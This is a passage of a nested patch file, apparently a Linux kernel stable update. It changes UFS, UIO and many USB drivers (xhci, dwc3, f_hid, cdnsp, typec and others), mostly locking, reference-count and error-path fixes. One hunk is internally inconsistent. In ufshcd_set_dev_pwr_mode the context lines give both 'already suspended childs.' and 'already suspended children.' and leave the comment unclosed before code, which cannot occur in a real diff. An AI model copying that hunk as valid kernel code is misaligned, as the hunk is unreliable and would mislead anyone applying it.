+  * requests have been completed.
+@@ -5398,13 +5418,17 @@ static int ufshcd_poll(struct Scsi_Host *shost, unsigned int queue_num)
+ 	WARN_ONCE(completed_reqs & ~hba->outstanding_reqs,
+ 		  "completed: %#lx; outstanding: %#lx\n", completed_reqs,
+ 		  hba->outstanding_reqs);
++	if (queue_num == UFSHCD_POLL_FROM_INTERRUPT_CONTEXT) {
++		/* Do not complete polled requests from interrupt context. */
++		ufshcd_clear_polled(hba, &completed_reqs);
++	}
+ 	hba->outstanding_reqs &= ~completed_reqs;
+ 	spin_unlock_irqrestore(&hba->outstanding_lock, flags);
+ 
+ 	if (completed_reqs)
+ 		__ufshcd_transfer_req_compl(hba, completed_reqs);
+ 
+-	return completed_reqs;
++	return completed_reqs != 0;
+ }
+ 
+ /**
+@@ -5435,7 +5459,7 @@ static irqreturn_t ufshcd_transfer_req_compl(struct ufs_hba *hba)
+ 	 * Ignore the ufshcd_poll() return value and return IRQ_HANDLED since we
+ 	 * do not want polling to trigger spurious interrupt complaints.
+ 	 */
+-	ufshcd_poll(hba->host, 0);
++	ufshcd_poll(hba->host, UFSHCD_POLL_FROM_INTERRUPT_CONTEXT);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -8747,8 +8771,6 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	struct scsi_device *sdp;
+ 	unsigned long flags;
+ 	int ret, retries;
+-	unsigned long deadline;
+-	int32_t remaining;
+ 
+ 	spin_lock_irqsave(hba->host->host_lock, flags);
+ 	sdp = hba->ufs_device_wlun;
+@@ -8781,14 +8803,9 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	 * callbacks hence set the RQF_PM flag so that it doesn't resume the
+ 	 * already suspended childs.
+ 	 * already suspended children.
+-	deadline = jiffies + 10 * HZ;
+ 	for (retries = 3; retries > 0; --retries) {
+-		ret = -ETIMEDOUT;
+-		remaining = deadline - jiffies;
+-		if (remaining <= 0)
+-			break;
+ 		ret = scsi_execute(sdp, cmd, DMA_NONE, NULL, 0, NULL, &sshdr,
+-				   remaining / HZ, 0, 0, RQF_PM, NULL);
++				   HZ, 0, 0, RQF_PM, NULL);
+ 		if (!scsi_status_is_check_condition(ret) ||
+ 				!scsi_sense_valid(&sshdr) ||
+ 				sshdr.sense_key != UNIT_ATTENTION)
+diff --git a/drivers/uio/uio_dmem_genirq.c b/drivers/uio/uio_dmem_genirq.c
+index 1106f33764047..792c3e9c9ce53 100644
+--- a/drivers/uio/uio_dmem_genirq.c
++++ b/drivers/uio/uio_dmem_genirq.c
+@@ -110,8 +110,10 @@ static irqreturn_t uio_dmem_genirq_handler(int irq, struct uio_info *dev_info)
+ 	 * remember the state so we can allow user space to enable it later.
+ 	 */
+ 
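++	/* Serialize with uio_dmem_genirq_irqcontrol() on SMP. */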
++	spin_lock(&priv->lock);
+ 	if (!test_and_set_bit(0, &priv->flags))
+ 		disable_irq_nosync(irq);
++	spin_unlock(&priv->lock);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -125,20 +127,19 @@ static int uio_dmem_genirq_irqcontrol(struct uio_info *dev_info, s32 irq_on)
+ 	 * in the interrupt controller, but keep track of the
+ 	 * state to prevent per-irq depth damage.
+ 	 *
+-	 * Serialize this operation to support multiple tasks.
++	 * Serialize this operation to support multiple tasks and concurrency
++	 * with the IRQ handler on SMP systems.
+ 	 */
+ 
+ 	spin_lock_irqsave(&priv->lock, flags);
+ 	if (irq_on) {
+ 		if (test_and_clear_bit(0, &priv->flags))
+ 			enable_irq(dev_info->irq);
+-		spin_unlock_irqrestore(&priv->lock, flags);
+ 	} else {
+-		if (!test_and_set_bit(0, &priv->flags)) {
+-			spin_unlock_irqrestore(&priv->lock, flags);
+-			disable_irq(dev_info->irq);
+-		}
++		if (!test_and_set_bit(0, &priv->flags))
++			disable_irq_nosync(dev_info->irq);
+ 	}
++	spin_unlock_irqrestore(&priv->lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index 2f29431f612e0..b23e543b3a3d5 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -2006,10 +2006,11 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 
+ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ {
+-	u32 field, length_field, remainder;
++	u32 field, length_field, zlp = 0;
+ 	struct cdnsp_ep *pep = preq->pep;
+ 	struct cdnsp_ring *ep_ring;
+ 	int num_trbs;
++	u32 maxp;
+ 	int ret;
+ 
+ 	ep_ring = cdnsp_request_to_transfer_ring(pdev, preq);
+@@ -2019,26 +2020,33 @@ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 	/* 1 TRB for data, 1 for status */
+ 	num_trbs = (pdev->three_stage_setup) ? 2 : 1;
+ 
++	maxp = usb_endpoint_maxp(pep->endpoint.desc);
++
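++	/*
++	 * A request that fills a whole number of packets needs an extra
++	 * zero-length TRB to terminate the transfer when a ZLP was requested.
++	 */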
++	if (preq->request.zero && preq->request.length &&
++	    (preq->request.length % maxp == 0)) {
++		num_trbs++;
++		zlp = 1;
++	}
++
+ 	ret = cdnsp_prepare_transfer(pdev, preq, num_trbs);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* If there's data, queue data TRBs */
+-	if (pdev->ep0_expect_in)
+-		field = TRB_TYPE(TRB_DATA) | TRB_IOC;
+-	else
+-		field = TRB_ISP | TRB_TYPE(TRB_DATA) | TRB_IOC;
+-
+ 	if (preq->request.length > 0) {
+-		remainder = cdnsp_td_remainder(pdev, 0, preq->request.length,
+-					       preq->request.length, preq, 1, 0);
++		field = TRB_TYPE(TRB_DATA);
+ 
+-		length_field = TRB_LEN(preq->request.length) |
+-				TRB_TD_SIZE(remainder) | TRB_INTR_TARGET(0);
++		if (zlp)
++			field |= TRB_CHAIN;
++		else
++			field |= TRB_IOC | (pdev->ep0_expect_in ? 0 : TRB_ISP);
+ 
+ 		if (pdev->ep0_expect_in)
+ 			field |= TRB_DIR_IN;
+ 
++		length_field = TRB_LEN(preq->request.length) |
++			       TRB_TD_SIZE(zlp) | TRB_INTR_TARGET(0);
++
+ 		cdnsp_queue_trb(pdev, ep_ring, true,
+ 				lower_32_bits(preq->request.dma),
+ 				upper_32_bits(preq->request.dma), length_field,
+@@ -2046,6 +2054,20 @@ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 				TRB_SETUPID(pdev->setup_id) |
+ 				pdev->setup_speed);
+ 
++		if (zlp) {
++			field = TRB_TYPE(TRB_NORMAL) | TRB_IOC;
++
++			if (!pdev->ep0_expect_in)
++				field = TRB_ISP;
++
++			cdnsp_queue_trb(pdev, ep_ring, true,
++					lower_32_bits(preq->request.dma),
++					upper_32_bits(preq->request.dma), 0,
++					field | ep_ring->cycle_state |
++					TRB_SETUPID(pdev->setup_id) |
++					pdev->setup_speed);
++		}
++
+ 		pdev->ep0_stage = CDNSP_DATA_STAGE;
+ 	}
+ 
+diff --git a/drivers/usb/core/hcd.c b/drivers/usb/core/hcd.c
+index faeaace0d197d..8300baedafd20 100644
+--- a/drivers/usb/core/hcd.c
++++ b/drivers/usb/core/hcd.c
+@@ -3133,8 +3133,12 @@ int usb_hcd_setup_local_mem(struct usb_hcd *hcd, phys_addr_t phys_addr,
+ 					     GFP_KERNEL,
+ 					     DMA_ATTR_WRITE_COMBINE);
+ 
+-	if (IS_ERR(local_mem))
++	if (IS_ERR_OR_NULL(local_mem)) {
++		if (!local_mem)
++			return -ENOMEM;
++
+ 		return PTR_ERR(local_mem);
++	}
+ 
+ 	/*
+ 	 * Here we pass a dma_addr_t but the arg type is a phys_addr_t.
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 1f348bc867c22..476b636185116 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -122,21 +122,25 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 	unsigned long flags;
+ 	int ret;
+ 	u32 reg;
++	u32 desired_dr_role;
+ 
+ 	mutex_lock(&dwc->mutex);
++	spin_lock_irqsave(&dwc->lock, flags);
++	desired_dr_role = dwc->desired_dr_role;
++	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	pm_runtime_get_sync(dwc->dev);
+ 
+ 	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_OTG)
+ 		dwc3_otg_update(dwc, 0);
+ 
+-	if (!dwc->desired_dr_role)
++	if (!desired_dr_role)
+ 		goto out;
+ 
+-	if (dwc->desired_dr_role == dwc->current_dr_role)
++	if (desired_dr_role == dwc->current_dr_role)
+ 		goto out;
+ 
+-	if (dwc->desired_dr_role == DWC3_GCTL_PRTCAP_OTG && dwc->edev)
++	if (desired_dr_role == DWC3_GCTL_PRTCAP_OTG && dwc->edev)
+ 		goto out;
+ 
+ 	switch (dwc->current_dr_role) {
+@@ -164,7 +168,7 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 	 */
+ 	if (dwc->current_dr_role && ((DWC3_IP_IS(DWC3) ||
+ 			DWC3_VER_IS_PRIOR(DWC31, 190A)) &&
+-			dwc->desired_dr_role != DWC3_GCTL_PRTCAP_OTG)) {
++			desired_dr_role != DWC3_GCTL_PRTCAP_OTG)) {
+ 		reg = dwc3_readl(dwc->regs, DWC3_GCTL);
+ 		reg |= DWC3_GCTL_CORESOFTRESET;
+ 		dwc3_writel(dwc->regs, DWC3_GCTL, reg);
+@@ -184,11 +188,11 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 
+-	dwc3_set_prtcap(dwc, dwc->desired_dr_role);
++	dwc3_set_prtcap(dwc, desired_dr_role);
+ 
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+-	switch (dwc->desired_dr_role) {
++	switch (desired_dr_role) {
+ 	case DWC3_GCTL_PRTCAP_HOST:
+ 		ret = dwc3_host_init(dwc);
+ 		if (ret) {
+@@ -1096,8 +1100,13 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 
+ 	if (!dwc->ulpi_ready) {
+ 		ret = dwc3_core_ulpi_init(dwc);
+-		if (ret)
++		if (ret) {
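++			/*
++			 * A ULPI read that timed out may succeed on a
++			 * later attempt, so reset the core and ask for
++			 * the probe to be retried by deferring it.
++			 */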
++			if (ret == -ETIMEDOUT) {
++				dwc3_core_soft_reset(dwc);
++				ret = -EPROBE_DEFER;
++			}
+ 			goto err0;
++		}
+ 		dwc->ulpi_ready = true;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 7c40f3ffc0544..b0a0351d2d8b5 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -261,7 +261,8 @@ static int dwc3_qcom_interconnect_init(struct dwc3_qcom *qcom)
+ 	if (IS_ERR(qcom->icc_path_apps)) {
+ 		dev_err(dev, "failed to get apps-usb path: %ld\n",
+ 				PTR_ERR(qcom->icc_path_apps));
+-		return PTR_ERR(qcom->icc_path_apps);
++		ret = PTR_ERR(qcom->icc_path_apps);
++		goto put_path_ddr;
+ 	}
+ 
+ 	max_speed = usb_get_maximum_speed(&qcom->dwc3->dev);
+@@ -274,16 +275,22 @@ static int dwc3_qcom_interconnect_init(struct dwc3_qcom *qcom)
+ 	}
+ 	if (ret) {
+ 		dev_err(dev, "failed to set bandwidth for usb-ddr path: %d\n", ret);
+-		return ret;
++		goto put_path_apps;
+ 	}
+ 
+ 	ret = icc_set_bw(qcom->icc_path_apps, APPS_USB_AVG_BW, APPS_USB_PEAK_BW);
+ 	if (ret) {
+ 		dev_err(dev, "failed to set bandwidth for apps-usb path: %d\n", ret);
+-		return ret;
++		goto put_path_apps;
+ 	}
+ 
+ 	return 0;
++
++put_path_apps:
++	icc_put(qcom->icc_path_apps);
++put_path_ddr:
++	icc_put(qcom->icc_path_ddr);
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index ca0a7d9eaa34e..6be6009f911e1 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -71,7 +71,7 @@ struct f_hidg {
+ 	wait_queue_head_t		write_queue;
+ 	struct usb_request		*req;
+ 
+-	int				minor;
++	struct device			dev;
+ 	struct cdev			cdev;
+ 	struct usb_function		func;
+ 
+@@ -84,6 +84,14 @@ static inline struct f_hidg *func_to_hidg(struct usb_function *f)
+ 	return container_of(f, struct f_hidg, func);
+ }
+ 
++static void hidg_release(struct device *dev)
++{
++	struct f_hidg *hidg = container_of(dev, struct f_hidg, dev);
++
++	kfree(hidg->set_report_buf);
++	kfree(hidg);
++}
++
+ /*-------------------------------------------------------------------------*/
+ /*                           Static descriptors                            */
+ 
+@@ -904,9 +912,7 @@ static int hidg_bind(struct usb_configuration *c, struct usb_function *f)
+ 	struct usb_ep		*ep;
+ 	struct f_hidg		*hidg = func_to_hidg(f);
+ 	struct usb_string	*us;
+-	struct device		*device;
+ 	int			status;
+-	dev_t			dev;
+ 
+ 	/* maybe allocate device-global string IDs, and patch descriptors */
+ 	us = usb_gstrings_attach(c->cdev, ct_func_strings,
+@@ -999,21 +1005,11 @@ static int hidg_bind(struct usb_configuration *c, struct usb_function *f)
+ 
+ 	/* create char device */
+ 	cdev_init(&hidg->cdev, &f_hidg_fops);
+-	dev = MKDEV(major, hidg->minor);
+-	status = cdev_add(&hidg->cdev, dev, 1);
++	status = cdev_device_add(&hidg->cdev, &hidg->dev);
+ 	if (status)
+ 		goto fail_free_descs;
+ 
+-	device = device_create(hidg_class, NULL, dev, NULL,
+-			       "%s%d", "hidg", hidg->minor);
+-	if (IS_ERR(device)) {
+-		status = PTR_ERR(device);
+-		goto del;
+-	}
+-
+ 	return 0;
+-del:
+-	cdev_del(&hidg->cdev);
+ fail_free_descs:
+ 	usb_free_all_descriptors(f);
+ fail:
+@@ -1244,9 +1240,7 @@ static void hidg_free(struct usb_function *f)
+ 
+ 	hidg = func_to_hidg(f);
+ 	opts = container_of(f->fi, struct f_hid_opts, func_inst);
+-	kfree(hidg->report_desc);
+-	kfree(hidg->set_report_buf);
+-	kfree(hidg);
++	put_device(&hidg->dev);
+ 	mutex_lock(&opts->lock);
+ 	--opts->refcnt;
+ 	mutex_unlock(&opts->lock);
+@@ -1256,8 +1250,7 @@ static void hidg_unbind(struct usb_configuration *c, struct usb_function *f)
+ {
+ 	struct f_hidg *hidg = func_to_hidg(f);
+ 
+-	device_destroy(hidg_class, MKDEV(major, hidg->minor));
+-	cdev_del(&hidg->cdev);
++	cdev_device_del(&hidg->cdev, &hidg->dev);
+ 
+ 	usb_free_all_descriptors(f);
+ }
+@@ -1266,6 +1259,7 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ {
+ 	struct f_hidg *hidg;
+ 	struct f_hid_opts *opts;
++	int ret;
+ 
+ 	/* allocate and initialize one new instance */
+ 	hidg = kzalloc(sizeof(*hidg), GFP_KERNEL);
+@@ -1277,17 +1271,28 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ 	mutex_lock(&opts->lock);
+ 	++opts->refcnt;
+ 
+-	hidg->minor = opts->minor;
++	device_initialize(&hidg->dev);
++	hidg->dev.release = hidg_release;
++	hidg->dev.class = hidg_class;
++	hidg->dev.devt = MKDEV(major, opts->minor);
++	ret = dev_set_name(&hidg->dev, "hidg%d", opts->minor);
++	if (ret) {
++		--opts->refcnt;
++		mutex_unlock(&opts->lock);
++		return ERR_PTR(ret);
++	}
++
+ 	hidg->bInterfaceSubClass = opts->subclass;
+ 	hidg->bInterfaceProtocol = opts->protocol;
+ 	hidg->report_length = opts->report_length;
+ 	hidg->report_desc_length = opts->report_desc_length;
+ 	if (opts->report_desc) {
+-		hidg->report_desc = kmemdup(opts->report_desc,
+-					    opts->report_desc_length,
+-					    GFP_KERNEL);
++		hidg->report_desc = devm_kmemdup(&hidg->dev, opts->report_desc,
++						 opts->report_desc_length,
++						 GFP_KERNEL);
+ 		if (!hidg->report_desc) {
+-			kfree(hidg);
++			put_device(&hidg->dev);
++			--opts->refcnt;
+ 			mutex_unlock(&opts->lock);
+ 			return ERR_PTR(-ENOMEM);
+ 		}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index c63c0c2cf649d..bf9878e1a72a8 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -734,13 +734,13 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	}
+ 
+ 	ret = gadget->ops->pullup(gadget, 0);
+-	if (!ret) {
++	if (!ret)
+ 		gadget->connected = 0;
+-		mutex_lock(&udc_lock);
+-		if (gadget->udc->driver)
+-			gadget->udc->driver->disconnect(gadget);
+-		mutex_unlock(&udc_lock);
+-	}
++
++	mutex_lock(&udc_lock);
++	if (gadget->udc->driver)
++		gadget->udc->driver->disconnect(gadget);
++	mutex_unlock(&udc_lock);
+ 
+ out:
+ 	trace_usb_gadget_disconnect(gadget, ret);
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index fdca28e72a3b4..d0e051beb3af9 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -629,10 +629,10 @@ static void fotg210_request_error(struct fotg210_udc *fotg210)
+ static void fotg210_set_address(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+-	if (ctrl->wValue >= 0x0100) {
++	if (le16_to_cpu(ctrl->wValue) >= 0x0100) {
+ 		fotg210_request_error(fotg210);
+ 	} else {
+-		fotg210_set_dev_addr(fotg210, ctrl->wValue);
++		fotg210_set_dev_addr(fotg210, le16_to_cpu(ctrl->wValue));
+ 		fotg210_set_cxdone(fotg210);
+ 	}
+ }
+@@ -713,17 +713,17 @@ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 
+ 	switch (ctrl->bRequestType & USB_RECIP_MASK) {
+ 	case USB_RECIP_DEVICE:
+-		fotg210->ep0_data = 1 << USB_DEVICE_SELF_POWERED;
++		fotg210->ep0_data = cpu_to_le16(1 << USB_DEVICE_SELF_POWERED);
+ 		break;
+ 	case USB_RECIP_INTERFACE:
+-		fotg210->ep0_data = 0;
++		fotg210->ep0_data = cpu_to_le16(0);
+ 		break;
+ 	case USB_RECIP_ENDPOINT:
+ 		epnum = ctrl->wIndex & USB_ENDPOINT_NUMBER_MASK;
+ 		if (epnum)
+ 			fotg210->ep0_data =
+-				fotg210_is_epnstall(fotg210->ep[epnum])
+-				<< USB_ENDPOINT_HALT;
++				cpu_to_le16(fotg210_is_epnstall(fotg210->ep[epnum])
++					    << USB_ENDPOINT_HALT);
+ 		else
+ 			fotg210_request_error(fotg210);
+ 		break;
+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index 01705e559c422..c61fc19ef1154 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -639,7 +639,6 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 
+ dealloc_usb3_hcd:
+ 	usb_remove_hcd(xhci->shared_hcd);
+-	xhci->shared_hcd = NULL;
+ 
+ dealloc_usb2_hcd:
+ 	usb_remove_hcd(hcd);
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index ad81e9a508b14..343709af4c16f 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2458,7 +2458,7 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 
+ 	switch (trb_comp_code) {
+ 	case COMP_SUCCESS:
+-		ep_ring->err_count = 0;
++		ep->err_count = 0;
+ 		/* handle success with untransferred data as short packet */
+ 		if (ep_trb != td->last_trb || remaining) {
+ 			xhci_warn(xhci, "WARN Successful completion on short TX\n");
+@@ -2484,7 +2484,7 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		if (xhci->quirks & XHCI_NO_SOFT_RETRY ||
+-		    (ep_ring->err_count++ > MAX_SOFT_RETRY) ||
++		    (ep->err_count++ > MAX_SOFT_RETRY) ||
+ 		    le32_to_cpu(slot_ctx->tt_info) & TT_SLOT)
+ 			break;
+ 
+@@ -2565,8 +2565,14 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 		case COMP_USB_TRANSACTION_ERROR:
+ 		case COMP_INVALID_STREAM_TYPE_ERROR:
+ 		case COMP_INVALID_STREAM_ID_ERROR:
+-			xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+-						    EP_SOFT_RESET);
++			xhci_dbg(xhci, "Stream transaction error ep %u no id\n",
++				 ep_index);
++			if (ep->err_count++ > MAX_SOFT_RETRY)
++				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
++							    EP_HARD_RESET);
++			else
++				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
++							    EP_SOFT_RESET);
+ 			goto cleanup;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index cc084d9505cdf..c9f06c5e4e9d2 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -933,6 +933,7 @@ struct xhci_virt_ep {
+ 	 * have to restore the device state to the previous state
+ 	 */
+ 	struct xhci_ring		*new_ring;
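++	/* Consecutive transaction errors, checked against the soft retry limit */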
++	unsigned int			err_count;
+ 	unsigned int			ep_state;
+ #define SET_DEQ_PENDING		(1 << 0)
+ #define EP_HALTED		(1 << 1)	/* For stall handling */
+@@ -1627,7 +1628,6 @@ struct xhci_ring {
+ 	 * if we own the TRB (if we are the consumer).  See section 4.9.1.
+ 	 */
+ 	u32			cycle_state;
+-	unsigned int            err_count;
+ 	unsigned int		stream_id;
+ 	unsigned int		num_segs;
+ 	unsigned int		num_trbs_free;
+diff --git a/drivers/usb/musb/musb_gadget.c b/drivers/usb/musb/musb_gadget.c
+index 6704a62a16659..ba20272d22215 100644
+--- a/drivers/usb/musb/musb_gadget.c
++++ b/drivers/usb/musb/musb_gadget.c
+@@ -1628,8 +1628,6 @@ static int musb_gadget_vbus_draw(struct usb_gadget *gadget, unsigned mA)
+ {
+ 	struct musb	*musb = gadget_to_musb(gadget);
+ 
+-	if (!musb->xceiv->set_power)
+-		return -EOPNOTSUPP;
+ 	return usb_phy_set_power(musb->xceiv, mA);
+ }
+ 
+diff --git a/drivers/usb/musb/omap2430.c b/drivers/usb/musb/omap2430.c
+index f571a65ae6ee2..476f55d1fec30 100644
+--- a/drivers/usb/musb/omap2430.c
++++ b/drivers/usb/musb/omap2430.c
+@@ -15,6 +15,7 @@
+ #include <linux/list.h>
+ #include <linux/io.h>
+ #include <linux/of.h>
++#include <linux/of_irq.h>
+ #include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/pm_runtime.h>
+@@ -310,6 +311,7 @@ static int omap2430_probe(struct platform_device *pdev)
+ 	struct device_node		*control_node;
+ 	struct platform_device		*control_pdev;
+ 	int				ret = -ENOMEM, val;
++	bool				populate_irqs = false;
+ 
+ 	if (!np)
+ 		return -ENODEV;
+@@ -328,6 +330,18 @@ static int omap2430_probe(struct platform_device *pdev)
+ 	musb->dev.dma_mask		= &omap2430_dmamask;
+ 	musb->dev.coherent_dma_mask	= omap2430_dmamask;
+ 
++	/*
++	 * Legacy SoCs using omap_device get confused if the node is moved
++	 * because of interconnect properties mixed into the node.
++	 */
++	if (of_get_property(np, "ti,hwmods", NULL)) {
++		dev_warn(&pdev->dev, "please update to probe with ti-sysc\n");
++		populate_irqs = true;
++	} else {
++		device_set_of_node_from_dev(&musb->dev, &pdev->dev);
++	}
++	of_node_put(np);
++
+ 	glue->dev			= &pdev->dev;
+ 	glue->musb			= musb;
+ 	glue->status			= MUSB_UNKNOWN;
+@@ -389,6 +403,46 @@ static int omap2430_probe(struct platform_device *pdev)
+ 		goto err2;
+ 	}
+ 
++	if (populate_irqs) {
++		struct resource musb_res[3];
++		struct resource *res;
++		int i = 0;
++
++		memset(musb_res, 0, sizeof(*musb_res) * ARRAY_SIZE(musb_res));
++
++		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++		if (!res)
++			goto err2;
++
++		musb_res[i].start = res->start;
++		musb_res[i].end = res->end;
++		musb_res[i].flags = res->flags;
++		musb_res[i].name = res->name;
++		i++;
++
++		ret = of_irq_get_byname(np, "mc");
++		if (ret > 0) {
++			musb_res[i].start = ret;
++			musb_res[i].flags = IORESOURCE_IRQ;
++			musb_res[i].name = "mc";
++			i++;
++		}
++
++		ret = of_irq_get_byname(np, "dma");
++		if (ret > 0) {
++			musb_res[i].start = ret;
++			musb_res[i].flags = IORESOURCE_IRQ;
++			musb_res[i].name = "dma";
++			i++;
++		}
++
++		ret = platform_device_add_resources(musb, musb_res, i);
++		if (ret) {
++			dev_err(&pdev->dev, "failed to add IRQ resources\n");
++			goto err2;
++		}
++	}
++
+ 	ret = platform_device_add_data(musb, pdata, sizeof(*pdata));
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to add platform_data\n");
+diff --git a/drivers/usb/roles/class.c b/drivers/usb/roles/class.c
+index dfaed7eee94fc..32e6d19f7011a 100644
+--- a/drivers/usb/roles/class.c
++++ b/drivers/usb/roles/class.c
+@@ -106,10 +106,13 @@ usb_role_switch_is_parent(struct fwnode_handle *fwnode)
+ 	struct fwnode_handle *parent = fwnode_get_parent(fwnode);
+ 	struct device *dev;
+ 
+-	if (!parent || !fwnode_property_present(parent, "usb-role-switch"))
++	if (!fwnode_property_present(parent, "usb-role-switch")) {
++		fwnode_handle_put(parent);
+ 		return NULL;
++	}
+ 
+ 	dev = class_find_device_by_fwnode(role_class, parent);
++	fwnode_handle_put(parent);
+ 	return dev ? to_role_switch(dev) : ERR_PTR(-EPROBE_DEFER);
+ }
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 747be69e5e699..5e912dd29b4c9 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -438,6 +438,8 @@ static int alauda_init_media(struct us_data *us)
+ 		+ MEDIA_INFO(us).blockshift + MEDIA_INFO(us).pageshift);
+ 	MEDIA_INFO(us).pba_to_lba = kcalloc(num_zones, sizeof(u16*), GFP_NOIO);
+ 	MEDIA_INFO(us).lba_to_pba = kcalloc(num_zones, sizeof(u16*), GFP_NOIO);
++	if (MEDIA_INFO(us).pba_to_lba == NULL || MEDIA_INFO(us).lba_to_pba == NULL)
++		return USB_STOR_TRANSPORT_ERROR;
+ 
+ 	if (alauda_reset_media(us) != USB_STOR_XFER_GOOD)
+ 		return USB_STOR_TRANSPORT_ERROR;
+diff --git a/drivers/usb/typec/bus.c b/drivers/usb/typec/bus.c
+index 26ea2fdec17dc..31c2a3130cadb 100644
+--- a/drivers/usb/typec/bus.c
++++ b/drivers/usb/typec/bus.c
+@@ -134,7 +134,7 @@ int typec_altmode_exit(struct typec_altmode *adev)
+ 	if (!adev || !adev->active)
+ 		return 0;
+ 
+-	if (!pdev->ops || !pdev->ops->enter)
++	if (!pdev->ops || !pdev->ops->exit)
+ 		return -EOPNOTSUPP;
+ 
+ 	/* Moving to USB Safe State */
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index b2bfcebe218f0..72f8d1e876004 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -794,8 +794,10 @@ struct tcpci *tcpci_register_port(struct device *dev, struct tcpci_data *data)
+ 		return ERR_PTR(err);
+ 
+ 	tcpci->port = tcpm_register_port(tcpci->dev, &tcpci->tcpc);
+-	if (IS_ERR(tcpci->port))
++	if (IS_ERR(tcpci->port)) {
++		fwnode_handle_put(tcpci->tcpc.fwnode);
+ 		return ERR_CAST(tcpci->port);
++	}
+ 
+ 	return tcpci;
+ }
+@@ -804,6 +806,7 @@ EXPORT_SYMBOL_GPL(tcpci_register_port);
+ void tcpci_unregister_port(struct tcpci *tcpci)
+ {
+ 	tcpm_unregister_port(tcpci->port);
++	fwnode_handle_put(tcpci->tcpc.fwnode);
+ }
+ EXPORT_SYMBOL_GPL(tcpci_unregister_port);
+ 
+diff --git a/drivers/usb/typec/tipd/core.c b/drivers/usb/typec/tipd/core.c
+index 2a77bab948f54..195c9c16f817f 100644
+--- a/drivers/usb/typec/tipd/core.c
++++ b/drivers/usb/typec/tipd/core.c
+@@ -814,20 +814,19 @@ static int tps6598x_probe(struct i2c_client *client)
+ 
+ 	ret = devm_tps6598_psy_register(tps);
+ 	if (ret)
+-		return ret;
++		goto err_role_put;
+ 
+ 	tps->port = typec_register_port(&client->dev, &typec_cap);
+ 	if (IS_ERR(tps->port)) {
+ 		ret = PTR_ERR(tps->port);
+ 		goto err_role_put;
+ 	}
+-	fwnode_handle_put(fwnode);
+ 
+ 	if (status & TPS_STATUS_PLUG_PRESENT) {
